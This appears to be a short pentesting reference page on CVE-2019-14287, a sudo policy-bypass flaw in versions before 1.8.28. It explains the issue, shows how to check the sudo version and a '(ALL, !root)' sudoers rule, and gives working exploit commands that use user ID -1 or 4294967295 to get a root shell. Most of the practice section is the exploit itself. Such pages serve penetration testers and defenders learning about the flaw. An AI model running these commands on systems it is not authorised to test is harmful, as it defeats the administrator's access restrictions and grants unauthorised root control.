User Restriction Bypass

CVE-2019-14287

Theory

The sudo vulnerability CVE-2019-14287 is a security policy bypass issue that provides a user or a program the ability to execute commands as root on a Linux system when the "sudoers configuration" explicitly disallows the root access. Exploiting the vulnerability requires the user to have sudo privileges that allow them to run commands with an arbitrary user ID, except root.

Practice

To exploit, sudo version must be vulnerable (sudo < 1.8.28)

$ sudo -V
Sudo version 1.8.27

You must be able to run a command with sudo with an arbitrary user ID, except root

$ sudo -l
[...]
(ALL, !root) ALL

If you have a full TTY, you can exploit it like this

sudo -u#-1 /bin/bash
sudo -u#4294967295 id

Last updated 1 year ago